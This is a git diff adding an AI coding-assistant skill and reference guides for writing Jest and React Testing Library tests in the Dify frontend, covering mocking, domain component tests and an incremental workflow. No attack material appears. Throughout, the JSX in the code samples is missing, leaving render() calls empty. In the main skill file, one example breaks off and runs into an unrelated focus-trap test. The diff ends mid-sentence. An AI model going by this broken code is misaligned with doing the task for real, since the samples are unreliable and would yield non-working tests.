diff --git a/.claude/skills/frontend-testing/SKILL.md b/.claude/skills/frontend-testing/SKILL.md new file mode 100644 index 0000000000..cd775007a0 --- /dev/null +++ b/.claude/skills/frontend-testing/SKILL.md @@ -0,0 +1,322 @@ +--- +name: frontend-testing +description: Generate Jest + React Testing Library tests for Dify frontend components, hooks, and utilities. Triggers on testing, spec files, coverage, Jest, RTL, unit tests, integration tests, or write/review test requests. +--- + +# Dify Frontend Testing Skill + +This skill enables Claude to generate high-quality, comprehensive frontend tests for the Dify project following established conventions and best practices. + +> **⚠️ Authoritative Source**: This skill is derived from `web/testing/testing.md`. When in doubt, always refer to that document as the canonical specification. + +## When to Apply This Skill + +Apply this skill when the user: + +- Asks to **write tests** for a component, hook, or utility +- Asks to **review existing tests** for completeness +- Mentions **Jest**, **React Testing Library**, **RTL**, or **spec files** +- Requests **test coverage** improvement +- Uses `pnpm analyze-component` output as context +- Mentions **testing**, **unit tests**, or **integration tests** for frontend code +- Wants to understand **testing patterns** in the Dify codebase + +**Do NOT apply** when: + +- User is asking about backend/API tests (Python/pytest) +- User is asking about E2E tests (Playwright/Cypress) +- User is only asking conceptual questions without code context + +## Quick Reference + +### Tech Stack + +| Tool | Version | Purpose | +|------|---------|---------| +| Jest | 29.7 | Test runner | +| React Testing Library | 16.0 | Component testing | +| happy-dom | - | Test environment | +| nock | 14.0 | HTTP mocking | +| TypeScript | 5.x | Type safety | + +### Key Commands + +```bash +# Run all tests +pnpm test + +# Watch mode +pnpm test -- --watch + +# Run specific file +pnpm test -- path/to/file.spec.tsx + +# Generate coverage report +pnpm test -- --coverage + +# Analyze component complexity +pnpm analyze-component + +# Review existing test +pnpm analyze-component --review +``` + +### File Naming + +- Test files: `ComponentName.spec.tsx` (same directory as component) +- Integration tests: `web/__tests__/` directory + +## Test Structure Template + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import Component from './index' + +// ✅ Import real project components (DO NOT mock these) +// import Loading from '@/app/components/base/loading' +// import { ChildComponent } from './child-component' + +// ✅ Mock external dependencies only +jest.mock('@/service/api') +jest.mock('next/navigation', () => ({ + useRouter: () => ({ push: jest.fn() }), + usePathname: () => '/test', +})) + +// Shared state for mocks (if needed) +let mockSharedState = false + +describe('ComponentName', () => { + beforeEach(() => { + jest.clearAllMocks() // ✅ Reset mocks BEFORE each test + mockSharedState = false // ✅ Reset shared state + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange + const props = { title: 'Test' } + + // Act + render() + + // Assert + expect(screen.getByText('Test')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should apply custom className', () => { + render() + expect(screen.getByRole('button')).toHaveClass('custom') + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should handle click events', () => { + const handleClick = jest.fn() + render() + + fireEvent.click(screen.getByRole('button')) + + expect(handleClick).toHaveBeenCalledTimes(1) + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle null data', () => { + render() + expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle empty array', () => { + render() + expect(screen.getByText(/empty/i)).toBeInTheDocument() + }) + }) +}) +``` + +## Testing Workflow (CRITICAL) + +### ⚠️ Incremental Approach Required + +**NEVER generate all test files at once.** For complex components or multi-file directories: + +1. **Analyze & Plan**: List all files, order by complexity (simple → complex) +1. **Process ONE at a time**: Write test → Run test → Fix if needed → Next +1. **Verify before proceeding**: Do NOT continue to next file until current passes + +``` +For each file: + ┌────────────────────────────────────────┐ + │ 1. Write test │ + │ 2. Run: pnpm test -- .spec.tsx │ + │ 3. PASS? → Mark complete, next file │ + │ FAIL? → Fix first, then continue │ + └────────────────────────────────────────┘ +``` + +### Complexity-Based Order + +Process in this order for multi-file testing: + +1. 🟢 Utility functions (simplest) +1. 🟢 Custom hooks +1. 🟡 Simple components (presentational) +1. 🟡 Medium components (state, effects) +1. 🔴 Complex components (API, routing) +1. 🔴 Integration tests (index files - last) + +### When to Refactor First + +- **Complexity > 50**: Break into smaller pieces before testing +- **500+ lines**: Consider splitting before testing +- **Many dependencies**: Extract logic into hooks first + +> 📖 See `references/workflow.md` for complete workflow details and todo list format. + +## Testing Strategy + +### Path-Level Testing (Directory Testing) + +When assigned to test a directory/path, test **ALL content** within that path: + +- Test all components, hooks, utilities in the directory (not just `index` file) +- Use incremental approach: one file at a time, verify each before proceeding +- Goal: 100% coverage of ALL files in the directory + +### Integration Testing First + +**Prefer integration testing** when writing tests for a directory: + +- ✅ **Import real project components** directly (including base components and siblings) +- ✅ **Only mock**: API services (`@/service/*`), `next/navigation`, complex context providers +- ❌ **DO NOT mock** base components (`@/app/components/base/*`) +- ❌ **DO NOT mock** sibling/child components in the same directory + +> See [Test Structure Template](#test-structure-template) for correct import/mock patterns. + +## Core Principles + +### 1. AAA Pattern (Arrange-Act-Assert) + +Every test should clearly separate: + +- **Arrange**: Setup test data and render component +- **Act**: Perform user actions +- **Assert**: Verify expected outcomes + +### 2. Black-Box Testing + +- Test observable behavior, not implementation details +- Use semantic queries (getByRole, getByLabelText) +- Avoid testing internal state directly +- **Prefer pattern matching over hardcoded strings** in assertions: + +```typescript +// ❌ Avoid: hardcoded text assertions +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Better: role-based queries +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Better: pattern matching +expect(screen.getByText(/loading/i)).toBeInTheDocument() +``` + +### 3. Single Behavior Per Test + +Each test verifies ONE user-observable behavior: + +```typescript +// ✅ Good: One behavior +it('should disable button when loading', () => { + render( + + + ) + + // Focus should cycle within modal + await user.tab() + expect(screen.getByText('First')).toHaveFocus() + + await user.tab() + expect(screen.getByText('Second')).toHaveFocus() + + await user.tab() + expect(screen.getByText('First')).toHaveFocus() // Cycles back + }) +}) +``` + +## Form Testing + +```typescript +describe('LoginForm', () => { + it('should submit valid form', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn() + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(onSubmit).toHaveBeenCalledWith({ + email: 'test@example.com', + password: 'password123', + }) + }) + + it('should show validation errors', async () => { + const user = userEvent.setup() + + render() + + // Submit empty form + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/email is required/i)).toBeInTheDocument() + expect(screen.getByText(/password is required/i)).toBeInTheDocument() + }) + + it('should validate email format', async () => { + const user = userEvent.setup() + + render() + + await user.type(screen.getByLabelText(/email/i), 'invalid-email') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/invalid email/i)).toBeInTheDocument() + }) + + it('should disable submit button while submitting', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn(() => new Promise(resolve => setTimeout(resolve, 100))) + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByRole('button', { name: /signing in/i })).toBeDisabled() + + await waitFor(() => { + expect(screen.getByRole('button', { name: /sign in/i })).toBeEnabled() + }) + }) +}) +``` + +## Data-Driven Tests with test.each + +```typescript +describe('StatusBadge', () => { + test.each([ + ['success', 'bg-green-500'], + ['warning', 'bg-yellow-500'], + ['error', 'bg-red-500'], + ['info', 'bg-blue-500'], + ])('should apply correct class for %s status', (status, expectedClass) => { + render() + + expect(screen.getByTestId('status-badge')).toHaveClass(expectedClass) + }) + + test.each([ + { input: null, expected: 'Unknown' }, + { input: undefined, expected: 'Unknown' }, + { input: '', expected: 'Unknown' }, + { input: 'invalid', expected: 'Unknown' }, + ])('should show "Unknown" for invalid input: $input', ({ input, expected }) => { + render() + + expect(screen.getByText(expected)).toBeInTheDocument() + }) +}) +``` + +## Debugging Tips + +```typescript +// Print entire DOM +screen.debug() + +// Print specific element +screen.debug(screen.getByRole('button')) + +// Log testing playground URL +screen.logTestingPlaygroundURL() + +// Pretty print DOM +import { prettyDOM } from '@testing-library/react' +console.log(prettyDOM(screen.getByRole('dialog'))) + +// Check available roles +import { getRoles } from '@testing-library/react' +console.log(getRoles(container)) +``` + +## Common Mistakes to Avoid + +### ❌ Don't Use Implementation Details + +```typescript +// Bad - testing implementation +expect(component.state.isOpen).toBe(true) +expect(wrapper.find('.internal-class').length).toBe(1) + +// Good - testing behavior +expect(screen.getByRole('dialog')).toBeInTheDocument() +``` + +### ❌ Don't Forget Cleanup + +```typescript +// Bad - may leak state between tests +it('test 1', () => { + render() +}) + +// Good - cleanup is automatic with RTL, but reset mocks +beforeEach(() => { + jest.clearAllMocks() +}) +``` + +### ❌ Don't Use Exact String Matching (Prefer Black-Box Assertions) + +```typescript +// ❌ Bad - hardcoded strings are brittle +expect(screen.getByText('Submit Form')).toBeInTheDocument() +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Good - role-based queries (most semantic) +expect(screen.getByRole('button', { name: /submit/i })).toBeInTheDocument() +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Good - pattern matching (flexible) +expect(screen.getByText(/submit/i)).toBeInTheDocument() +expect(screen.getByText(/loading/i)).toBeInTheDocument() + +// ✅ Good - test behavior, not exact UI text +expect(screen.getByRole('button')).toBeDisabled() +expect(screen.getByRole('alert')).toBeInTheDocument() +``` + +**Why prefer black-box assertions?** + +- Text content may change (i18n, copy updates) +- Role-based queries test accessibility +- Pattern matching is resilient to minor changes +- Tests focus on behavior, not implementation details + +### ❌ Don't Assert on Absence Without Query + +```typescript +// Bad - throws if not found +expect(screen.getByText('Error')).not.toBeInTheDocument() // Error! + +// Good - use queryBy for absence assertions +expect(screen.queryByText('Error')).not.toBeInTheDocument() +``` diff --git a/.claude/skills/frontend-testing/references/domain-components.md b/.claude/skills/frontend-testing/references/domain-components.md new file mode 100644 index 0000000000..ed2cc6eb8a --- /dev/null +++ b/.claude/skills/frontend-testing/references/domain-components.md @@ -0,0 +1,523 @@ +# Domain-Specific Component Testing + +This guide covers testing patterns for Dify's domain-specific components. + +## Workflow Components (`workflow/`) + +Workflow components handle node configuration, data flow, and graph operations. + +### Key Test Areas + +1. **Node Configuration** +1. **Data Validation** +1. **Variable Passing** +1. **Edge Connections** +1. **Error Handling** + +### Example: Node Configuration Panel + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import NodeConfigPanel from './node-config-panel' +import { createMockNode, createMockWorkflowContext } from '@/__mocks__/workflow' + +// Mock workflow context +jest.mock('@/app/components/workflow/hooks', () => ({ + useWorkflowStore: () => mockWorkflowStore, + useNodesInteractions: () => mockNodesInteractions, +})) + +let mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), +} + +let mockNodesInteractions = { + handleNodeSelect: jest.fn(), + handleNodeDelete: jest.fn(), +} + +describe('NodeConfigPanel', () => { + beforeEach(() => { + jest.clearAllMocks() + mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), + } + }) + + describe('Node Configuration', () => { + it('should render node type selector', () => { + const node = createMockNode({ type: 'llm' }) + render() + + expect(screen.getByLabelText(/model/i)).toBeInTheDocument() + }) + + it('should update node config on change', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + render() + + await user.selectOptions(screen.getByLabelText(/model/i), 'gpt-4') + + expect(mockWorkflowStore.updateNode).toHaveBeenCalledWith( + node.id, + expect.objectContaining({ model: 'gpt-4' }) + ) + }) + }) + + describe('Data Validation', () => { + it('should show error for invalid input', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'code' }) + + render() + + // Enter invalid code + const codeInput = screen.getByLabelText(/code/i) + await user.clear(codeInput) + await user.type(codeInput, 'invalid syntax {{{') + + await waitFor(() => { + expect(screen.getByText(/syntax error/i)).toBeInTheDocument() + }) + }) + + it('should validate required fields', async () => { + const node = createMockNode({ type: 'http', data: { url: '' } }) + + render() + + fireEvent.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/url is required/i)).toBeInTheDocument() + }) + }) + }) + + describe('Variable Passing', () => { + it('should display available variables from upstream nodes', () => { + const upstreamNode = createMockNode({ + id: 'node-1', + type: 'start', + data: { outputs: [{ name: 'user_input', type: 'string' }] }, + }) + const currentNode = createMockNode({ + id: 'node-2', + type: 'llm', + }) + + mockWorkflowStore.nodes = [upstreamNode, currentNode] + mockWorkflowStore.edges = [{ source: 'node-1', target: 'node-2' }] + + render() + + // Variable selector should show upstream variables + fireEvent.click(screen.getByRole('button', { name: /add variable/i })) + + expect(screen.getByText('user_input')).toBeInTheDocument() + }) + + it('should insert variable into prompt template', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + render() + + // Click variable button + await user.click(screen.getByRole('button', { name: /insert variable/i })) + await user.click(screen.getByText('user_input')) + + const promptInput = screen.getByLabelText(/prompt/i) + expect(promptInput).toHaveValue(expect.stringContaining('{{user_input}}')) + }) + }) +}) +``` + +## Dataset Components (`dataset/`) + +Dataset components handle file uploads, data display, and search/filter operations. + +### Key Test Areas + +1. **File Upload** +1. **File Type Validation** +1. **Pagination** +1. **Search & Filtering** +1. **Data Format Handling** + +### Example: Document Uploader + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DocumentUploader from './document-uploader' + +jest.mock('@/service/datasets', () => ({ + uploadDocument: jest.fn(), + parseDocument: jest.fn(), +})) + +import * as datasetService from '@/service/datasets' +const mockedService = datasetService as jest.Mocked + +describe('DocumentUploader', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('File Upload', () => { + it('should accept valid file types', async () => { + const user = userEvent.setup() + const onUpload = jest.fn() + mockedService.uploadDocument.mockResolvedValue({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + await waitFor(() => { + expect(mockedService.uploadDocument).toHaveBeenCalledWith( + expect.any(FormData) + ) + }) + }) + + it('should reject invalid file types', async () => { + const user = userEvent.setup() + + render() + + const file = new File(['content'], 'test.exe', { type: 'application/x-msdownload' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + expect(screen.getByText(/unsupported file type/i)).toBeInTheDocument() + expect(mockedService.uploadDocument).not.toHaveBeenCalled() + }) + + it('should show upload progress', async () => { + const user = userEvent.setup() + + // Mock upload with progress + mockedService.uploadDocument.mockImplementation(() => { + return new Promise((resolve) => { + setTimeout(() => resolve({ id: 'doc-1' }), 100) + }) + }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + expect(screen.getByRole('progressbar')).toBeInTheDocument() + + await waitFor(() => { + expect(screen.queryByRole('progressbar')).not.toBeInTheDocument() + }) + }) + }) + + describe('Error Handling', () => { + it('should handle upload failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument.mockRejectedValue(new Error('Upload failed')) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByText(/upload failed/i)).toBeInTheDocument() + }) + }) + + it('should allow retry after failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument + .mockRejectedValueOnce(new Error('Network error')) + .mockResolvedValueOnce({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByRole('button', { name: /retry/i })).toBeInTheDocument() + }) + + await user.click(screen.getByRole('button', { name: /retry/i })) + + await waitFor(() => { + expect(screen.getByText(/uploaded successfully/i)).toBeInTheDocument() + }) + }) + }) +}) +``` + +### Example: Document List with Pagination + +```typescript +describe('DocumentList', () => { + describe('Pagination', () => { + it('should load first page on mount', async () => { + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 1')).toBeInTheDocument() + }) + + expect(mockedService.getDocuments).toHaveBeenCalledWith('ds-1', { page: 1 }) + }) + + it('should navigate to next page', async () => { + const user = userEvent.setup() + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 1')).toBeInTheDocument() + }) + + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '11', name: 'Doc 11' }], + total: 50, + page: 2, + pageSize: 10, + }) + + await user.click(screen.getByRole('button', { name: /next/i })) + + await waitFor(() => { + expect(screen.getByText('Doc 11')).toBeInTheDocument() + }) + }) + }) + + describe('Search & Filtering', () => { + it('should filter by search query', async () => { + const user = userEvent.setup() + jest.useFakeTimers() + + render() + + await user.type(screen.getByPlaceholderText(/search/i), 'test query') + + // Debounce + jest.advanceTimersByTime(300) + + await waitFor(() => { + expect(mockedService.getDocuments).toHaveBeenCalledWith( + 'ds-1', + expect.objectContaining({ search: 'test query' }) + ) + }) + + jest.useRealTimers() + }) + }) +}) +``` + +## Configuration Components (`app/configuration/`, `config/`) + +Configuration components handle forms, validation, and data persistence. + +### Key Test Areas + +1. **Form Validation** +1. **Save/Reset** +1. **Required vs Optional Fields** +1. **Configuration Persistence** +1. **Error Feedback** + +### Example: App Configuration Form + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import AppConfigForm from './app-config-form' + +jest.mock('@/service/apps', () => ({ + updateAppConfig: jest.fn(), + getAppConfig: jest.fn(), +})) + +import * as appService from '@/service/apps' +const mockedService = appService as jest.Mocked + +describe('AppConfigForm', () => { + const defaultConfig = { + name: 'My App', + description: '', + icon: 'default', + openingStatement: '', + } + + beforeEach(() => { + jest.clearAllMocks() + mockedService.getAppConfig.mockResolvedValue(defaultConfig) + }) + + describe('Form Validation', () => { + it('should require app name', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Clear name field + await user.clear(screen.getByLabelText(/name/i)) + await user.click(screen.getByRole('button', { name: /save/i })) + + expect(screen.getByText(/name is required/i)).toBeInTheDocument() + expect(mockedService.updateAppConfig).not.toHaveBeenCalled() + }) + + it('should validate name length', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toBeInTheDocument() + }) + + // Enter very long name + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'a'.repeat(101)) + + expect(screen.getByText(/name must be less than 100 characters/i)).toBeInTheDocument() + }) + + it('should allow empty optional fields', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Leave description empty (optional) + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalled() + }) + }) + }) + + describe('Save/Reset Functionality', () => { + it('should save configuration', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Updated App') + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalledWith( + 'app-1', + expect.objectContaining({ name: 'Updated App' }) + ) + }) + + expect(screen.getByText(/saved successfully/i)).toBeInTheDocument() + }) + + it('should reset to default values', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Changed Name') + + // Reset + await user.click(screen.getByRole('button', { name: /reset/i })) + + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + it('should show unsaved changes warning', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.type(screen.getByLabelText(/name/i), ' Updated') + + expect(screen.getByText(/unsaved changes/i)).toBeInTheDocument() + }) + }) + + describe('Error Handling', () => { + it('should show error on save failure', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockRejectedValue(new Error('Server error')) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/failed to save/i)).toBeInTheDocument() + }) + }) + }) +}) +``` diff --git a/.claude/skills/frontend-testing/references/mocking.md b/.claude/skills/frontend-testing/references/mocking.md new file mode 100644 index 0000000000..bf0bd79690 --- /dev/null +++ b/.claude/skills/frontend-testing/references/mocking.md @@ -0,0 +1,363 @@ +# Mocking Guide for Dify Frontend Tests + +## ⚠️ Important: What NOT to Mock + +### DO NOT Mock Base Components + +**Never mock components from `@/app/components/base/`** such as: + +- `Loading`, `Spinner` +- `Button`, `Input`, `Select` +- `Tooltip`, `Modal`, `Dropdown` +- `Icon`, `Badge`, `Tag` + +**Why?** + +- Base components will have their own dedicated tests +- Mocking them creates false positives (tests pass but real integration fails) +- Using real components tests actual integration behavior + +```typescript +// ❌ WRONG: Don't mock base components +jest.mock('@/app/components/base/loading', () => () =>
Loading
) +jest.mock('@/app/components/base/button', () => ({ children }: any) => ) + +// ✅ CORRECT: Import and use real base components +import Loading from '@/app/components/base/loading' +import Button from '@/app/components/base/button' +// They will render normally in tests +``` + +### What TO Mock + +Only mock these categories: + +1. **API services** (`@/service/*`) - Network calls +1. **Complex context providers** - When setup is too difficult +1. **Third-party libraries with side effects** - `next/navigation`, external SDKs +1. **i18n** - Always mock to return keys + +## Mock Placement + +| Location | Purpose | +|----------|---------| +| `web/__mocks__/` | Reusable mocks shared across multiple test files | +| Test file | Test-specific mocks, inline with `jest.mock()` | + +## Essential Mocks + +### 1. i18n (Auto-loaded via Shared Mock) + +A shared mock is available at `web/__mocks__/react-i18next.ts` and is auto-loaded by Jest. +**No explicit mock needed** for most tests - it returns translation keys as-is. + +For tests requiring custom translations, override the mock: + +```typescript +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'my.custom.key': 'Custom translation', + } + return translations[key] || key + }, + }), +})) +``` + +### 2. Next.js Router + +```typescript +const mockPush = jest.fn() +const mockReplace = jest.fn() + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + replace: mockReplace, + back: jest.fn(), + prefetch: jest.fn(), + }), + usePathname: () => '/current-path', + useSearchParams: () => new URLSearchParams('?key=value'), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should navigate on click', () => { + render() + fireEvent.click(screen.getByRole('button')) + expect(mockPush).toHaveBeenCalledWith('/expected-path') + }) +}) +``` + +### 3. Portal Components (with Shared State) + +```typescript +// ⚠️ Important: Use shared state for components that depend on each other +let mockPortalOpenState = false + +jest.mock('@/app/components/base/portal-to-follow-elem', () => ({ + PortalToFollowElem: ({ children, open, ...props }: any) => { + mockPortalOpenState = open || false // Update shared state + return
{children}
+ }, + PortalToFollowElemContent: ({ children }: any) => { + // ✅ Matches actual: returns null when portal is closed + if (!mockPortalOpenState) return null + return
{children}
+ }, + PortalToFollowElemTrigger: ({ children }: any) => ( +
{children}
+ ), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + mockPortalOpenState = false // ✅ Reset shared state + }) +}) +``` + +### 4. API Service Mocks + +```typescript +import * as api from '@/service/api' + +jest.mock('@/service/api') + +const mockedApi = api as jest.Mocked + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + + // Setup default mock implementation + mockedApi.fetchData.mockResolvedValue({ data: [] }) + }) + + it('should show data on success', async () => { + mockedApi.fetchData.mockResolvedValue({ data: [{ id: 1 }] }) + + render() + + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + }) + }) + + it('should show error on failure', async () => { + mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 5. HTTP Mocking with Nock + +```typescript +import nock from 'nock' + +const GITHUB_HOST = 'https://api.github.com' +const GITHUB_PATH = '/repos/owner/repo' + +const mockGithubApi = (status: number, body: Record, delayMs = 0) => { + return nock(GITHUB_HOST) + .get(GITHUB_PATH) + .delay(delayMs) + .reply(status, body) +} + +describe('GithubComponent', () => { + afterEach(() => { + nock.cleanAll() + }) + + it('should display repo info', async () => { + mockGithubApi(200, { name: 'dify', stars: 1000 }) + + render() + + await waitFor(() => { + expect(screen.getByText('dify')).toBeInTheDocument() + }) + }) + + it('should handle API error', async () => { + mockGithubApi(500, { message: 'Server error' }) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 6. Context Providers + +```typescript +import { ProviderContext } from '@/context/provider-context' +import { createMockProviderContextValue, createMockPlan } from '@/__mocks__/provider-context' + +describe('Component with Context', () => { + it('should render for free plan', () => { + const mockContext = createMockPlan('sandbox') + + render( + + + + ) + + expect(screen.getByText('Upgrade')).toBeInTheDocument() + }) + + it('should render for pro plan', () => { + const mockContext = createMockPlan('professional') + + render( + + + + ) + + expect(screen.queryByText('Upgrade')).not.toBeInTheDocument() + }) +}) +``` + +### 7. SWR / React Query + +```typescript +// SWR +jest.mock('swr', () => ({ + __esModule: true, + default: jest.fn(), +})) + +import useSWR from 'swr' +const mockedUseSWR = useSWR as jest.Mock + +describe('Component with SWR', () => { + it('should show loading state', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + error: undefined, + isLoading: true, + }) + + render() + expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) +}) + +// React Query +import { QueryClient, QueryClientProvider } from '@tanstack/react-query' + +const createTestQueryClient = () => new QueryClient({ + defaultOptions: { + queries: { retry: false }, + mutations: { retry: false }, + }, +}) + +const renderWithQueryClient = (ui: React.ReactElement) => { + const queryClient = createTestQueryClient() + return render( + + {ui} + + ) +} +``` + +## Mock Best Practices + +### ✅ DO + +1. **Use real base components** - Import from `@/app/components/base/` directly +1. **Use real project components** - Prefer importing over mocking +1. **Reset mocks in `beforeEach`**, not `afterEach` +1. **Match actual component behavior** in mocks (when mocking is necessary) +1. **Use factory functions** for complex mock data +1. **Import actual types** for type safety +1. **Reset shared mock state** in `beforeEach` + +### ❌ DON'T + +1. **Don't mock base components** (`Loading`, `Button`, `Tooltip`, etc.) +1. Don't mock components you can import directly +1. Don't create overly simplified mocks that miss conditional logic +1. Don't forget to clean up nock after each test +1. Don't use `any` types in mocks without necessity + +### Mock Decision Tree + +``` +Need to use a component in test? +│ +├─ Is it from @/app/components/base/*? +│ └─ YES → Import real component, DO NOT mock +│ +├─ Is it a project component? +│ └─ YES → Prefer importing real component +│ Only mock if setup is extremely complex +│ +├─ Is it an API service (@/service/*)? +│ └─ YES → Mock it +│ +├─ Is it a third-party lib with side effects? +│ └─ YES → Mock it (next/navigation, external SDKs) +│ +└─ Is it i18n? + └─ YES → Uses shared mock (auto-loaded). Override only for custom translations +``` + +## Factory Function Pattern + +```typescript +// __mocks__/data-factories.ts +import type { User, Project } from '@/types' + +export const createMockUser = (overrides: Partial = {}): User => ({ + id: 'user-1', + name: 'Test User', + email: 'test@example.com', + role: 'member', + createdAt: new Date().toISOString(), + ...overrides, +}) + +export const createMockProject = (overrides: Partial = {}): Project => ({ + id: 'project-1', + name: 'Test Project', + description: 'A test project', + owner: createMockUser(), + members: [], + createdAt: new Date().toISOString(), + ...overrides, +}) + +// Usage in tests +it('should display project owner', () => { + const project = createMockProject({ + owner: createMockUser({ name: 'John Doe' }), + }) + + render() + expect(screen.getByText('John Doe')).toBeInTheDocument() +}) +``` diff --git a/.claude/skills/frontend-testing/references/workflow.md b/.claude/skills/frontend-testing/references/workflow.md new file mode 100644 index 0000000000..b0f2994bde --- /dev/null +++ b/.claude/skills/frontend-testing/references/workflow.md @@ -0,0 +1,269 @@ +# Testing Workflow Guide + +This guide defines the workflow for generating tests, especially for complex components or directories with multiple files. + +## Scope Clarification + +This guide addresses **multi-file workflow** (how to process multiple test files). For coverage requirements within a single test file, see `web/testing/testing.md` § Coverage Goals. + +| Scope | Rule | +|-------|------| +| **Single file** | Complete coverage in one generation (100% function, >95% branch) | +| **Multi-file directory** | Process one file at a time, verify each before proceeding | + +## ⚠️ Critical Rule: Incremental Approach for Multi-File Testing + +When testing a **directory with multiple files**, **NEVER generate all test files at once.** Use an incremental, verify-as-you-go approach. + +### Why Incremental? + +| Batch Approach (❌) | Incremental Approach (✅) | +|---------------------|---------------------------| +| Generate 5+ tests at once | Generate 1 test at a time | +| Run tests only at the end | Run test immediately after each file | +| Multiple failures compound | Single point of failure, easy to debug | +| Hard to identify root cause | Clear cause-effect relationship | +| Mock issues affect many files | Mock issues caught early | +| Messy git history | Clean, atomic commits possible | + +## Single File Workflow + +When testing a **single component, hook, or utility**: + +``` +1. Read source code completely +2. Run `pnpm analyze-component ` (if available) +3. Check complexity score and features detected +4. Write the test file +5. Run test: `pnpm test -- .spec.tsx` +6. Fix any failures +7. Verify coverage meets goals (100% function, >95% branch) +``` + +## Directory/Multi-File Workflow (MUST FOLLOW) + +When 